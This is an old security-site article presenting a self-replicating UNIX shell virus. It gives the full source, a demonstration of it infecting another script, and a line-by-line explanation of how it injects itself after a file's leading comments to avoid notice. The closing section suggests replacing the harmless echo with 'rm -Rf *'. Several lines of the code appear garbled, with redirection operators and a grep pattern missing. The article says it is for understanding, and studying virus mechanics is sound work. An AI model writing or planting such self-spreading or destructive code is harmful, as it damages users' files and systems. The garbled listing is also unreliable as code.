A Brief Introduction to UNIX SHELL Virus

Create: 2003-06-09

Author: watercloud (watercloud_at_xfocus.org)

A Brief Introduction to UNIX SHELL Virus

1. Preface

Speaking of virus it has always been somewhat mysterious. I remember when

I compiled my first dos virus in assembling it was such a painful task. From

the initial assumption to the final accomplishment it took me more than 3

months, but what I had compiled was still at mess. Recently I come up with

the idea that virus ultimately is something that affects other files and

spreads itself, so it would not be too complicated to compile a virus by

shell. Then I conveniently compiled the following script. Its functionality

is to affect other shell programs.

This program is of little practical significance, but it is helpful to

visually understand the virus spread mechanism. Therefore, its instructive

significance is more important than the practical one.

2. Program Code

#!/bin/sh

#file name: virus_demo.sh

#purpose: shell virus demonstration

#note: the virus will affect all the files that end with .sh in the current

directory, but it will not affect them repeatedly.

#compiler: watercloud@xfocus.org

#date: 2003-5-13

#B:

vFile=$_ ; vTmp=/tmp/.vTmp.$$

for f in ./*.sh; do

if [ ! -w $f -a ! -r $vFile ]; then continue; fi

if grep '' $f ; then continue; fi

if sed -n '1p' $f | grep 'csh'; then continue; fi

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi

vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`

sed -n "1,${vNo}p" $vTmp $f

(sed -n '/^#B:/,/^#E:

/p' $vFile ;echo ) $f

vNo=`expr $vNo + 1`

sed -n "${vNo},\$p" $vTmp $f

rm -f $vTmp

done /dev/null 2&1

unset vTmp ;unset vFile ;unset vNo

echo "Hi, here is a demo shell virus in your script !"

#E:

#EOF

This program is of little practical significance, but it is helpful to

visually understand the virus spread mechanism. Therefore, its instructive

significance is more important than the practical one.

3. Demonstration

Test：

First put 2 files in the current directory. One is virus file, and another

is for affect test.

[cloud@ /export/home/cloud/vir] ls -l

drwxr-xr-x 2 cloud staff 512 6?? 4 17:43 ./

drwxr-xr-x 10 cloud staff 1024 6?? 4 17:41 ../

-rwxr--r-- 1 cloud staff 89 6?? 4 17:43 test.sh

-rwxr--r-- 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

Let's have a look at the victim script. It is very simple:

[cloud@ /export/home/cloud/vir] cat test.sh

#!/bin/sh

# Just a demo for virus test

# Author : foo

# Date : 3000-1-1

ls -l

#EOF

Begin to affect.

[cloud@ /export/home/cloud/vir] ./virus_demo.sh

Hi, here is a demo shell virus in your script !

The result after affect：

[cloud@ /export/home/cloud/vir] cat test.sh

#!/bin/sh

# Just a demo for virus test

# Author : foo

# Date : 3000-1-1

#B:

vFile=$_ ; vTmp=/tmp/.vTmp.$$

for f in ./*.sh; do

if [ ! -w $f -a ! -r $vFile ]; then continue; fi

if grep '' $f ; then continue; fi

if sed -n '1p' $f | grep 'csh'; then continue; fi

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi

vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`

sed -n "1,${vNo}p" $vTmp $f

(sed -n '/^#B:/,/^#E:

/p' $vFile ;echo ) $f

vNo=`expr $vNo + 1`

sed -n "${vNo},\$p" $vTmp $f

rm -f $vTmp

done /dev/null 2&1

unset vTmp ;unset vFile ;unset vNo

echo "Hi, here is a demo shell virus in your script !"

#E:

ls -l

#EOF

The virus body:

#B:

. . . .

#E:

is copied, thus the virus is spreaded.

Please note that the position where the virus body is injected is the beginning

of the source test.sh's effective program line. This results from the fact

that most shell program experts prefer to make notes at the beginning of the

program. You are not expected to put others' note information to the end,

or it would be too obvious.

Execute the new virus body：

[cloud@ /export/home/cloud/vir] ./test.sh

Hi, here is a demo shell virus in your script !

Printing information in the virus body.

-rwxr-xr-x 1 cloud staff 724 6?? 4 17:44 test.sh

-rwxr-xr-x 1 cloud staff 773 6?? 4 17:42 virus_demo.sh

4. Brief Explanation

Let's analyze the virus step by step：

#B:

The virus body begins to tag, thus the program can locate itself during the

copying.

vFile=$_ ; vTmp=/tmp/.vTmp.$$

Defining 2 variables. One is temporary file, another records the current file-

name $_. Therefore it's required this line should be the first line in the

effective line of the program, otherwise it's impossible to acquire the name

of the current program, and subsequently it's impossible to find the virus

body for copying.

for f in ./*.sh; do

Begin to circle, and find out all the programs that end with .sh in the

current directory.

if [ ! -w $f -a ! -r $vFile ]; then continue; fi

If the target has write privilege and if the virus source file has read

privilege.

if grep '' $f ; then continue; fi

If the target has been irreversibly affected. If so it would be immoral to

affect it again.

if sed -n '1p' $f | grep 'csh'; then continue; fi

If the target shell is in csh, they are too different in grammar. Give up.

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi

Get ready to affect. First copy a backup for the target. What if the copying

fails? Of course have no choice but give up.

vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`

It seems to be complicated, but for shell virus learners they are expected

to know awk and the formal expression. This is the one used to find how many

comment lines and blank line in the program beginning, so as to determine

virus body's inject position.

sed -n "1,${vNo}p" $vTmp $f

A sed command copy the beginning comment section of the target file back

from the backup file.

(sed -n '/^#B:/,/^#E:

/p' $vFile ;echo ) $f

One more sed to finish virus body transportation.

vNo=`expr $vNo + 1`

sed -n "${vNo},\$p" $vTmp $f

The last sed moves other sections of the target file back. sed is powerful！！

rm -f $vTmp

Clean up temporary files.

done /dev/null 2&1

Circle is over.

unset vTmp ;unset vFile ;unset vNo

Clean up crime scene.

echo "Hi, here is a demo shell virus in your script !"

Since the file has been affected, show some indication to tell this is an

affected one.

#E:

The virus body stops tagging, so that the program copying locates itself.

5. PS

From it we can see the script virus is very simple. It can be compile without

much knowledge. And its destructive ability should never be overlooked. For

example, if we change the echo information in the program into rm -Rf * .

On the other hand it shows how powerful the shell is. Just imagine how much

effort it takes for a traditional program to handle PE file structure and

ELF structure.

The above program has been tested on Linux and Solaris. It should also be

appliable for windows users on Cygwin.

By the way, the purpose of this article is to share virus understandings

with others, not to teach how to compile virus and victimize others. Please

keep it in mind.

#EOF

#GAME OVER

echo "COMMENTS ARE WELCOME!"

Copyright ? 1998-2003 XFOCUS Team. All Rights Reserved